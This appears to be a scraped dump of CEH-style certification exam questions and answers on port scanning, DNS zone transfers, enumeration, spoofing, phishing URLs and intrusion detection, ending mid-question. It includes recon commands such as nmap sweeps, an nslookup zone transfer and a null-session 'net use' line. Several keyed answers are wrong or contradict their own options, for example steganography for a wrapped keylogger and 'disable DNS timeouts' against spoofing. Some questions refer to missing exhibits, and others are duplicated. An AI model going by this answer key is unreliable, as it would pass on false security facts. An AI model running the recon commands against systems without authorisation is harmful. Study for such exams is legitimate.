informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the
Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use
custom-built algorithms or obscure algorithms purchased from corrupt governments. For this
reason, Michael and other security analysts like him have been forced to find different methods of
deciphering terrorist messages.
One method that Michael thought of using was to hide malicious code inside seemingly harmless
programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is
able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth
keylogger into a mapping program file readme.txt and then sends that as an attachment to the
terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into
a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a
day with a built in SMTP server.
What technique has Michael used to disguise this keylogging software?
A. Wrapping
B. Hidden channels
C. Steganography
D. ADS
C. Steganography.
John is the network administrator of XSECURITY systems. His network was recently compromised. He analyzes the logfiles to investigate the attack.
Take a look at the following Linux logfile snippet. The hacker compromised and "owned" a Linux machine. What is the hacker trying to accomplish here?

A. The hacker is attempting to compromise more machines on the network
B. The hacker is trying to cover his tracks
C. The hacker is running a buffer overflow exploit to lock down the system
D. The hacker is planting a rootkit
B. The hacker is trying to cover his tracks.

By deleting temporary directories adn emptying files like bash_history that contains the last commands used with the bash shell he is trying to cover his tracks.
John has performed a scan of the web server with NMAP but did not gather enough information to
accurately identify which operating system is running on the remote host. How could you use a
web server to help in identifying the OS that is being used?
A. Telnet to port 8080 on the web server and look at the default page code
B. Telnet to an open port and grab the banner
C. Connect to the web server with an FTP client
D. Connect to the web server with a browser and look at the web page
B. Telnet to an open port and grab the banner.

Most people don't care about changing the banners presented by applications listening to open ports, and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.
After a client sends a connection request (SYN) packet to the server, the server will respond
(SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by
the client. This sequence number is predictable; the attack connects to a service first with its own
IP address, records the sequence number chosen, and then opens a second connection from a
forged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but
can guess the correct responses. If the source IP address is used for authentication, then the
attacker can use the one-sided communication to break into the server.
What attacks can you successfully launch against a server using the above technique?
A. Web page defacement attacks
B. Session Hijacking attacks
C. Denial of Service attacks
D. IP spoofing attacks
B. Session hijacking

The term session hijacking refers to the exploitation of a valid computer session-sometimes also called a session key- to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a "magic cookie" used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer.
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Using programming hooks to inform the kernel of Trojan horse behavior
B. Rejecting packets generated by Trojan horse programs
C. Helping you catch unexpected changes to a system utility file that might indicate it had been
replaced by a Trojan horse
D. Automatically deleting Trojan horse programs
C. Helping you catch unexpected changes to a system utility file that might indicate that it had been replaced by a Trojan Horse.

Tripwire generates a database of the most common files and directories on your system. Once it is generated, you can then check the current state of your system against the original database, and get a report of all the files that have been modified, added or deleted. This comes in handy if you allow other people access to your machine, and even if you don't, if someone does get access you'll know whether files such as /bin/login etc.
You have been charged with performing a number of security tests against a partner organization
in Australia. Your boss, who is in charge of your company and the partner company's IT
departments, wants you to run tests just like an outside hacker would against their network. He
also wants you to perform all of your tests without tipping off the IT department at the partner
company. You have no knowledge of the partner company's systems other than their name and
their external website. You decide to perform some passive scanning so as not to tip off anyone at
the partner company.?
What would be considered passive scanning?
A. Firewalking
B. Whois
C. Netcraft
D. Friendly Pinger
B. Whois
C. Netcraft
Jack is conducting a port scan of a target network. He knows that his target network has a web
server and that a mail server is up and running. Jack has been sweeping the network but has not
been able to get any responses from the remote target. Check all of the following that could be a
likely cause of the lack of response?
A. The destination network might be down
B. The packet TTL value is too low and cannot reach the target
C. The host might be down
D. UDP is filtered by a gateway
E. The TCP window size does not match
F. ICMP is filtered by a gateway
A. The destination network might be down
B. The packet TTL value is too low and cannot reach the target
C. The host might be down
F. ICMP is filtered by a gateway

If the destination host or the destination network is down, there will be no way to get an answer, and if TTL is set too low, the UDP packets will "die" before reaching the host because of too many hops between the scanning computer and the target. The TCP receive window size is the amount of received data (in bytes) that can be buffered during a connection. The sending host can send only that amount of data before it must wait for an acknowledgment and window update from the receiving host. ICMP is used mainly for echo requests and not in port scans.
A Hacker would typically use a botnet to send a large number of queries to open DNS servers.
These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS
server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the
attacking machines, which are identifiable. But blocking queries from DNS servers brings
problems in its wake. A DNS server has a valid role to play in the workings of the Internet.
Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or
visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.

A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS forward lookup attacks
D. DNS reverse connection attacks.
A. DNS reflector and amplification attacks.
An employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by a network-based IDS application?
A. Create a ping flood
B. Create multiple false positives
C. Create a covert network tunnel
D. Create a SYN flood
C. Create a covert network tunnel.

HTTP tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed a HTTP tunnel. Very few firewalls block outgoing HTTP traffic.
A majority of attacks come from insiders, people who have direct access to a company's computer
system as part of their job function or a business relationship. Who is considered an insider?
A. A government agency since they know the company's computer system strengths and
weaknesses
B. A competitor to the company because they can directly benefit from the publicity generated by
making such an attack
C. The CEO of the company because he has access to all of the computer systems
D. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps,
and consultants
D. Disgruntled employees, customer, suppliers, vendors, business partners, contractors, temps, and consultants.

An insider is anyone who has a foot in the door one way or another.
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-09-25 00:01 EST
Host 192.168.0.0 seems to be a subnet broadcast address (returned 4 extra pings).
Host 192.168.0.1 appears to be up.
MAC Address: 00:12:17:31:4F:C4 (Cisco-Linksys)
Host 192.168.0.6 appears to be up.
MAC Address: 00:C0:4F:A1:25:4A (Dell Computer)
Host 192.168.0.10 appears to be up.
MAC Address: 00:B0:D0:FE:87:68 (Dell Computer)
Host 192.168.0.13 appears to be up.
MAC Address: 00:C0:4F:A1:25:89 (Dell Computer)
Host 192.168.0.100 appears to be up.
MAC Address: 00:C0:4F:A1:27:BF (Dell Computer)
Host 192.168.0.103 appears to be up.
MAC Address: 00:0D:88:66:FB:87 (D-Link)
Host 192.168.0.104 appears to be up.
Host 192.168.0.108 appears to be up.
MAC Address: 00:11:D8:90:D6:7F (Asustek Computer)
Host 192.168.0.255 seems to be a subnet broadcast address (returned 4 extra
pings).
Nmap run completed -- 256 IP addresses (8 hosts up) scanned in 4.390 seconds
Which of the following nmap commands in Linux produces the above output?
A. run nmap -TX 192.168.0.1/24
B. sudo nmap -sP 192.168.0.1/24
C. root nmap -sA 192.168.0.1/24
D. launch nmap -PP 192.168.0.1/24
B. sudo nmap -sP 192.168.0.1/24
Peter extracts the SID list from Windows 2000 Server machine using the hacking tool
"SIDExtracter". Here is the output of the SIDs:
S-1-5-21-1125394485-807628933-549785860-100 John
-1-5-21-1125394485-807628933-549785860-652 Rebecca
-1-5-21-1125394485-807628933-549785860-412 Sheela
-1-5-21-1125394485-807628933-549785860-999 Shawn
-1-5-21-1125394485-807628933-549785860-777 Somia
-1-5-21-1125394485-807628933-549785860-500 Chang
-1-5-21-1125394485-807628933-549785860-555 Micah
From the above list identify the user account with System Administrator privileges?

A. Sheela
B. Shawn
C. Chang
D. Somia
E. Rebecca
F. John
G. Micah
C. Chang

The SID of the built-in administrator will always follow this example:
S-1-5-domain-500
Jack is conducting a port scan of a target network. He knows that his target network has a web
server and that a mail server is up and running. Jack has been sweeping the network but has not
been able to get any responses from the remote target. Check all of the following that could be a
likely cause of the lack of response?
A. ICMP is filtered by a gateway
B. The host might be down
C. The TCP window size does not match
D. The destination network might be down
E. UDP is filtered by a gateway
F. The packet TTL value is too low and cannot reach the target
A. ICMP is filtered by a gateway
B. The host might be down
D. The destination network might be down
F. The packet TTL value is too low and cannot reach the target
Which of the following would be the best reason for sending a single SMTP message to an
address that does not exist within the target company?
A. To gather information about internal hosts used in email treatment
B. To verify information about the Mail administrator
C. To gather information about procedure in place to deal with such messages
D. To create a denial of service attack
A. To gather information about internal hosts used in e-mail treatment.

The replay from the email server that states that there is no such recipient will also give you some information about the name of the e-mail server, versions used and so on.
What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
A. The ethical hacker does not use the same techniques or skills as a cracker.
B. The ethical hacker does it strictly for financial motives unlike a cracker.
C. The ethical hacker has authorization from the owner of the target.
D. The ethical hacker is just a cracker who is getting paid.
C. The ethical hacker has authorization from the owner of the target.
What does the term "Ethical Hacking" mean?
A. Someone who is hacking for ethical reasons.
B. Someone who is using his/her skills for ethical reasons.
C. Someone who is using his/her skills for defensive purposes.
D. Someone who is using his/her skills for offensive purposes.
C. Someone who is using his/her skills for defensive purposes.
Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person who hacks for defensive purposes
D. A person whohacksfor offensive purposes
C. A person who hacks for defensive purposes.
Where should a security tester be looking for information that could be used by an attacker against
an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
What are the two basic types of attacks? (Choose two.)
A. DoS
B. Passive
C. Sniffing
D. Active
E. Cracking
B. Passive
D. Active
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com website
for contact information and telephone number numbers but do not find it listed there. You know
that they had the entire staff directory listed on their website 12 months ago but now it is not there.
How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners andcustomers website for this information.
B. Visit Archive.org site to retrive the Internet archive of the Acme website.
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and
mail fraud?
A. 18 U.S.C 1029 Possession of Access Devices
B. 18 U.S.C 1030 Fraud and related activity in connection with computers
C. 18 U.S.C 1343 Fraud by wire, radio or television
D. 18 U.S.C 1361 Injury to Government Property
E. 18 U.S.C 1362 Government communication systems
F. 18 U.S.C 1831 Economic Espionage Act
G. 18 U.S.C 1832 Trade Secrets Act
B. 18-USC0-1030 Fraud and related activity in connection with computers.
Which one of the following is defined as the process of distributing incorrect Internet Protocol (IP)
addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
B. DNS Poisoning.
You are footprinting an organization to gather competitive intelligence. You visit the company's
website for contact information and telephone numbers but do not find it listed there. You know
that they had the entire staff directory listed on their website 12 months ago but not it is not there.
How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google's search engine and view the cached copy.
B. Visit Archive.org web site to retrieve the Internet archive of the company's website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners andcustomers website for this information.
B. Visit Archive.org to retrieve the Internet archive of the company's website.
A pass4sure security System Administrator is reviewing the network system log files. He notes the
following: -
Network log files are at 5 MB at 12:00 noon. - At 14:00 hours, the log files at 3 MB. What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place.
B. He should log the event as suspicious activity, continue to investigate and take further steps according to site security policy.
To what does "message repudiation" refer to what concept in the realm of email security?
A. Message repudiation means a user can validate which mail server or servers a message was passed through.
B. Message repudiation means a user can claim damages for a mail message that damaged their reputation.
C. Message repudiation means a recipient can be sure that a message was sent from a particular person.
D. Message repudiation means a recipient can be sure that a message was sent from a certain host.
E. Message repudiation means a sender can claim they did not actually send a particular message.
E. Message repudiation means a sender can claim that they did not actually send a particular message.
Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this
abnormal? (Note: The student is being tested on concept learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dumo.)
What is odd about this attack? (Choose the most appropriate statement)
A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.
B. This is back orifice activity as the scan comes from port 31337.
C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid.
D. There packets were created by a tool; they were not created by a standard IP stack.
B. This is back orifice activity as the scan comes from port 31337
A very useful resource for passively gathering information about a target company is:
A. Host scanning
B. Whois search
C. Traceroute
D. Ping sweep
B. Whois search.
You receive an email with the following message: Hello Steve, We are having technical difficulty in
restoring user database record after the recent blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password.
http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services. Sincerely, Technical Support SuperEmailServices From this email you suspect that this message was sent by some hacker since you have been using their email services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef which
looks like hexadecimal numbers. You immediately enter the following at Windows 2000 command
prompt: Ping0xde.0xad.0xbe.0xef You get a response with a valid IP address. What is the
obstructed IP address in the e-mail URL?

A. 222.173.190.239
B. 233.34.45.64
C. 54.23.56.55
D. 199.223.23.45
A. 222.173.190.239
Which of the following tools are used for footprinting?(Choose four.)
A. Sam Spade
B. NSLookup
C. Traceroute
D. Neotrace
E. Cheops
A. Sam Spade
B. NSLookup
C. Traceroute
D. Neotrace
According to the CEH methodology, what is the next step to be performed after footprinting?
A. Enumeration
B. Scanning
C. System Hacking
D. Social Engineering
E. Expanding Influence
B. Scanning
NSLookup is a good tool to use to gain additional information about a target network. What does
the following command accomplish? nslookup > server > set type =any > ls -d
A. Enables DNS spoofing
B. Loads bogus entries into the DNS table
C. Verifies zone security
D. Performs a zone transfer
E. Resets the DNS cache
D. Performs a zone transfer
While footprinting a network, what port/service should you look for to attempt a zone transfer?
A. 53 UDP
B. 53 TCP
C. 25 UDP
D. 25 TCP
E. 161 UDP
F. 22 TCP
G. 60 TCP
B. 53 TCP
Your lab partner is trying to find out more information about a competitors web site. The site has a
.com extension. She has decided to use some online whois tools and look in one of the regional
Internet registrys. Which one would you suggest she looks in first?
A. LACNIC
B. ARIN
C. APNIC
D. RIPE
E. AfriNIC
B. ARIN
Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? Select the best answer.
A. There are two external DNS Servers for Internet domains. Both are AD integrated.
B. All external DNS is done by an ISP.
C. Internal AD Integrated DNS servers are using private DNS names that are unregistered.
D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
A. There are two external DNS Servers for Internet domains. Both are AD integrated
Exhibit Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session. What does the first and second column mean? Select two.

A. The first column reports the sequence number
B. The second column reports the difference between the current and last sequence number
C. The second column reports the next sequence number
D. The first column reports the difference between current and last sequence number
A. The first column reports the sequence number
B. The second column reports the difference between the current and last sequence number
While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for all
the pings sent out. What is the most likely cause behind this response?
A. The firewall is dropping the packets.
B. An in-line IDS is dropping the packets.
C. A router is blocking ICMP.
D. The host does not respond to ICMP packets.
C. A router is blocking ICMP
The following excerpt is taken from a honeyput log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question: (Note: The objective of this questions is to test whether the
student has learnt about passive OS fingerprinting (which should tell them the OS from log
captures): can they tell a SQL injection attack signature;
can they infer if a user ID has been created by an attacker and whether they can read plain source - destination entries from log entries.) What can you infer from the above log?

A. The system has been compromised and backdoored by the attacker.
B. The actual IP of the successful attacker is 24.9.255.53.
A. The system has been compromised and backdoored by the attacker.
War dialing is a very old attack and depicted in movies that were made years ago. Why would a
modem security tester consider using such an old technique?
A. It is cool, and if it works in the movies it must work in real life.
B. It allows circumvention of protection mechanisms by being on the internal network.
C. It allows circumvention of the company PBX.
D. A good security tester would not use such a derelict technique.
B. It allows circumvention of protection mechanisms by being on the internal network.
What are twp types of ICMP code used when using the ping command?
A. It uses types 0 and 8.
B. It uses types 13 and 14.
C. It uses types 15 and 17.
D. The ping command does not use ICMP but uses UDP.
A. It uses types 0 and 8.
An Nmap scan shows the following open ports, and nmap also reports that the OS guessing
results to match too many signatures hence it cannot reliably beidentified: 21 ftp 23 telnet 80 http
443https What does this suggest ?
A. This is a Windows Domain Controller
B. The host is not firewalled
C. The host is not a Linux or Solaris system
D. The host is not properly patched
D. The host is not properly patched.
What port scanning method involves sending spoofed packets to a target system and then looking
for adjustments to the IPID on a zombie system?
A. Blind Port Scanning
B. Idle Scanning
C. Bounce Scanning
D. Stealth Scanning
E. UDP Scanning
B. Idle scanning.
What port scanning method is the most reliable but also the most detectable?
A. Null Scanning
B. Connect Scanning
C. ICMP Scanning
D. Idlescan Scanning
E. Half Scanning
F. Verbose Scanning
B. Connect scanning
What does an ICMP (Code 13) message normally indicates?
A. It indicates that the destination host is unreachable
B. It indicates to the host that the datagram which triggered the source quench message will need
to be re-sent
C. It indicates that the packet has been administratively dropped in transit
D. It is a request to the host to cut back the rate at which it is sending traffic to the Internet
destination
C. It indicates that the packet has been administratively dropped in transit.
Because UDP is a connectionless protocol: (Select 2)
A. UDPrecvfrom() and write() scanning will yield reliable results
B. It can only be used for Connect scans
C. It can only be used for SYN scans
D. There is no guarantee that the UDP packets will arrive at their destination
E. ICMP port unreachable messages may not be returned successfully
D. There is no guarantee that the UDP packets will arrive at their destination
E. ICMP port unreachable messages may not be returned successfully.
What ICMP message types are used by the ping command?
A. Timestamp request (13) and timestamp reply (14)
B. Echo request (8) and Echo reply (0)
C. Echo request (0) and Echo reply (1)
D. Ping request (1) and Ping reply (2)
B. Echo request (8) and Echo reply (0)
Which of the following systems would not respond correctly to an nmap XMAS scan?
A. Windows 2000 Server running IIS 5
B. Any Solaris version running SAMBA Server
C. Any version of IRIX
D. RedHat Linux 8.0 running Apache Web Server
A. Windows 2000 Server running IIS 5
home/root # traceroute www.targetcorp.com traceroute to www.targetcorp.com (192.168.12.18),
64 hops may, 40 byte packets 1 router.anon.com (192.13.212.254) 1.373 ms 1.123 ms 1.280 ms 2
192.13.133.121 (192.13.133.121) 3.680 ms 3.506 ms 4.583 ms 3 firewall.anon.com
(192.13.192.17) 127.189 ms 257.404 ms 208.484 ms 4 anon-gw.anon.com (192.93.144.89) 471.68 ms 376.875 ms 228.286 ms 5 fe5-0.lin.isp.com
(192.162.231.225) 2.961 ms 3.852 ms 2.974 ms 6 fe0-0.lon0.isp.com (192.162.231.234) 3.979 ms
3.243 ms 4.370 ms 7 192.13.133.5 (192.13.133.5) 11.454 ms 4.221 ms 3.333 ms 6 * * * 7 * * * 8
www.targetcorp.com (192.168.12.18) 5.392 ms 3.348 ms 3.199 ms

Use the tracerroute results shown above to answer the following question: The perimeter security at targetcorp.com does not permit ICMP-TTL-expired packets out.
A. True
When Nmap performs a ping sweep, which of the following sets of requests does it send to the
target device?
A. ICMP ECHO_REQUEST & TCP SYN
B. ICMP ECHO_REQUEST & TCP ACK
C. ICMP ECHO_REPLY & TFP RST
D. ICMP ECHO_REPLY & TCP FIN
B. ICMP ECHO_REQUEST & TCP ACK
_______ is one of the programs used to wardial.
A. DialIT
B. Netstumbler
C. TooPac
D. Kismet
E. ToneLoc
E. ToneLoc
What are the default passwords used by SNMP? (Choose two.)
A. Password
B. SA
C. Private
D. Administrator
E. Public
F. Blank
C. Private
E. Public.
Which of the following ICMP message types are used for destinations unreachables?
A. 0
B. 3
C. 11
D. 13
E. 17
B. 3
What is the proper response for a FIN scan if the port is closed?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
E. RST
What is the proper response for a FIN scan if the port is open?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
F. No response.
What is the proper response for a X-MAS scan if the port is closed?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
E. RST
What is the proper response for a X-MAS scan if the port is open?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
F. No response
What flags are set in a X-MAS scan? (Choose all that apply.)
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. URG
C. FIN
D. PSH
F. URG
Which of the following is an automated vulnerability assessment tool.
A. Whack a Mole
B. Nmap
C. Nessus
D. Kismet
E. Jill32
C. Nessus
What is the disadvantage of an automated vulnerability assessment tool?
A. Ineffective
B. Slow
C. Prone to false positives
D. Prone to false negatives
E. Noisy
E. Noisy
What are two things that are possible when scanning UDP ports? (Choose two.)
A. A reset will be returned
B. An ICMP message will be returned
C. The four-way handshake will not be completed
D. An RFC 1294 message will be returned
E. Nothing
B. An ICMP message will be returned
E. Nothing.
What does a type 3 code 13 represent? (Choose two.)
A. Echo request
B. Destination unreachable
C. Network unreachable
D. Administratively prohibited
E. Port unreachable
F. Time exceeded
B. Destination unreachable
D. Administratively prohibited
Destination unreachable administratively prohibited messages can inform the hacker to what?
A. That a circuit level proxy has been installed and is filtering traffic
B. That his/her scans are being blocked by a honeypot or jail
C. That the packets are being malformed by the scanning software
D. That a router or other packet-filtering device is blocking traffic
E. That the network is functioning normally
D. That a router or other packet filtering device is blocking traffic.
Which of the following Nmap commands would be used to perform a stack fingerprinting?
A. Nmap -O -p80
B. Nmap -hU -Q
C. Nmap -sT -p
D. Nmap -u -o -w2
E. Nmap -sS -0p target
A. Nmap -O -p80
Name two software tools used for OS guessing. (Choose two.)
A. Nmap
B. Snadboy
C. Queso
D. UserInfo
E. NetBus
A. Nmap
C. Queso
Sandra is the security administrator of pass4sure.com. One day she notices that the
pass4sure.com Oracle database server has been compromised and customer information along
with financial data has been stolen. The financial loss will be estimated in millions of dollars if the
database gets into the hands of competitors. Sandra wants to report this crime to the law
enforcement agencies immediately. Which organization coordinates computer crime investigations
throughout the United States?
A. NDCA
B. NICP
C. CIRP
D. NPC
E. CIA
D. NPC
Which of the following Nmap commands would be used to perform a UDP scan of the lower 1024
ports?
A. Nmap -h -U
B. Nmap -hU
C. Nmap -sU -p 1-1024
D. Nmap -u -v -w2 1-1024
E. Nmap -sS -O target/1024
C. Nmap -sU -p 1-1024
Which of the following commands runs snort in packet logger mode?
A. ./snort -dev -h ./log
B. ./snort -dev -l ./log
C. ./snort -dev -o ./log
D. ./snort -dev -p ./log
B. ./snort - dev -h ./log
Which of the following command line switch would you use for OS detection in Nmap?
A. -D
B. -O
C. -P
D. -X
B. -O
Which Type of scan sends a packets with no flags set? Select the Answer
A. Open Scan
B. Null Scan
C. Xmas Scan
D. Half-Open Scan
B. Null Scan
Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes and
stores them for offline cracking. Once cracked, these passwords can provide easy access to
whatever network resources the user account has access to. But Jess is not picking up hashed
from the network. Why?
A. The network protocol is configured to use SMB Signing.
B. The physical network wire is on fibre optic cable.
C. The network protocol is configured to use IPSEC.
D. L0phtCrack SMB filtering only works through Switches and not Hubs.
A. The network protocol is configured to use SMB Signing.
Which address translation scheme would allow a single public IP address to always correspond to
a single machine on an internal network, allowing "server publishing"?
A. Overloading Port Address Translation
B. Dynamic Port Address Translation
C. Dynamic Network Address Translation
D. Static Network Address Translation
D. Static Network Address Translation
What is the following command used for? net use \targetipc$ "" /u:""
A. Grabbing the etc/passwd file
B. Grabbing the SAM
C. Connecting to a Linux computer through Samba.
D. This command is used to connect as a null session
E. Enumeration of Cisco routers
D. This command is used to connect as a null session.
What is the proper response for a NULL scan if the port is closed?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
E. RST
One of your team members has asked you to analyze the following SOA record. What is the TTL?
Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.
D. 2400
One of your team members has asked you to analyze the following SOA record. What is the
version? Rutgers. edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800
2400.
A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800
A. 200303028
MX record priority increases as the number increases. (True/False.)
A. True
B. False
B. False
Which of the following tools can be used to perform a zone transfer?
A. NSLookup
B. Finger
C. Dig
D. Sam Spade
E. Host
F. Netcat
G. Neotrace
A. NSLookup
C. Dig
D. Sam Spade
E. Host
Under what conditions does a secondary name server request a zone transfer from a primary
name server?
A. When a primary SOA is higher that a secondary SOA
B. When a secondary SOA is higher that a primary SOA
C. When a primary name server has had its service restarted
D. When a secondary name server has had its service restarted
E. When the TTL falls to zero
A. When a primary SOA is higher than a secondary SOA.
What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through
the firewall if your network is comprised of Windows NT, 2000, and XP? (Choose all that apply.)
A. 110
B. 135
C. 139
D. 161
E. 445
F. 1024
B. 135
C. 139
E. 445
What is a NULL scan?
A. A scan in which all flags are turned off
B. A scan in which certain flags are off
C. A scan in which all flags are on
D. A scan in which the packet size is set to zero
E. A scan witha illegal packet size
A. A scan in which all flags are turned off.
What is the proper response for a NULL scan if the port is open?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
F. No response.
Which of the following statements about a zone transfer correct? (Choose three.)
A. A zone transfer is accomplished with the DNS
B. A zone transfer is accomplished with the nslookup service
C. A zone transfer passes all zone information that a DNS server maintains
D. A zone transfer passes all zone information thata nslookup server maintains
E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
F. Zone transfers cannot occur on the Internet
A. A zone transfer is accomplished with the DNS
C. A zone transfer passes all zone information that a DNS server maintains
E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections.
You have the SOA presented below in your Zone. Your secondary servers have not been able to
contact your primary server to synchronize information. How long will the secondary servers
attempt to contact the primary server before it considers that zone is dead and stops responding to
queries? collegae.edu.SOA,cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)
A. One day
B. One hour
C. One week
D. One month
C. One week.
Tess King is using the nslookup command to craft queries to list all DNS information (such as
Name Servers, host names, MX records, CNAME records, glue records (delegation for child
Domains), zone serial number, TimeToLive (TTL) records, etc) for a Domain. What do you think
Tess King is trying to accomplish? Select the best answer.
A. A zone harvesting
B. A zone transfer
C. A zone update
D. A zone estimate
B. A zone transfer
A zone file consists of which of the following Resource Records (RRs)?
A. DNS, NS, AXFR, and MX records
B. DNS, NS, PTR, and MX records
C. SOA, NS, AXFR, and MX records
D. SOA, NS, A, and MX records
D. SOA, NS, A and MX records
Let's imagine three companies (A, B and C), all competing in a challenging global environment.
Company A and B are working together in developing a product that will generate a major
competitive advantage for them. Company A has a secure DNS server while company B has a
DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B,
company C gains access to outgoing e-mails from company
How do you prevent DNS spoofing? (Select the Best Answer.)
A. Install DNS logger and track vulnerable packets
B. Install DNS Anti-spoofing
C. Disable DNS timeouts
D. Disable DNS Zone Transfer
C. Disable DNS timeouts.
Which DNS resource record can indicate how long any "DNS poisoning" could last?
A. MX
B. SOA
C. NS
D. TIMEOUT
B. SOA
Which of the following tools are used for enumeration?
A. SolarWinds
B. USER2SID
C. Cheops
D. SID2USER
E. DumpSec
B. User2Sid
D. Sid2User
E. DumpSec
Susan has attached to her company's network. She has managed to synchronize her boss's sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory. What kind of attack is Susan carrying on?

A. A sniffing attack
B. A spoofing attack
C. A man in the middle attack
D. A denial of service attack
C. A man in the middle attack.
What does FIN in TCP flag define?
A. Used to close a TCP connection
B. Used to abort a TCP connection abruptly
C. Used to indicate the beginning of a TCP connection
D. Used to acknowledge receipt of a previous packet or transmission
A. Used to close a TCP connection.
What sequence of packets is sent during the initial TCP three-way handshake?
A. SYN, URG, ACK
B. FIN, FIN-ACK, ACK
C. SYN, ACK, SYN-ACK
D. SYN, SYN-ACK, ACK
D. SYN, SYN-ACK, ACK
As a securing consultant, what are some of the things you would recommend to a company to
ensure DNS security? Select the best answers.
A. Use the same machines for DNS and other applications
B. Harden DNS servers
C. Use split-horizon operation for DNS servers
D. Restrict Zone transfers
E. Have subnet diversity between DNS servers
B. Harden DNS servers
C. Use split-horizon operation for DNS servers
D. Restrict Zone transfers
E. Have subnet diversity between DNS servers
Vulnerability mapping occurs after which phase of a penetration test?
A. Host scanning
B. Passive information gathering
C. Analysis of host scanning
D. Network level discovery
C. Analysis of host scanning.
What tool can crack Windows SMB passwords simply by listening to network traffic? Select the
best answer.
A. This is not possible
B. Netbus
C. NTFSDOS
D. L0phtcrack
D. L0phtcrack
Vulnerability mapping occurs after which phase of a penetration test?
A. Host scanning
B. Passive information gathering
C. Analysis of host scanning
D. Network level discovery
C. Analysis of host scanning
A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers.
A. Use port security on his switches.
B. Use a tool like ARPwatch to monitor for strange ARP activity.
C. Use a firewall between all LAN segments.
D. If you have a small network, use static ARP entries.
E. Use only static IP addresses on all PC's.
A. Use port security on his switches.
B. Use a tool like ARPwatch to monitor for strange ARP activity.
D. If you have a small network, use static ARP entries
Peter, a Network Administrator, has come to you looking for advice on a tool that would help him
perform SNMP enquires over the network. Which of these tools would do the SNMP enumeration
he is looking for? Select the best answers.
A. SNMPUtil
B. SNScan
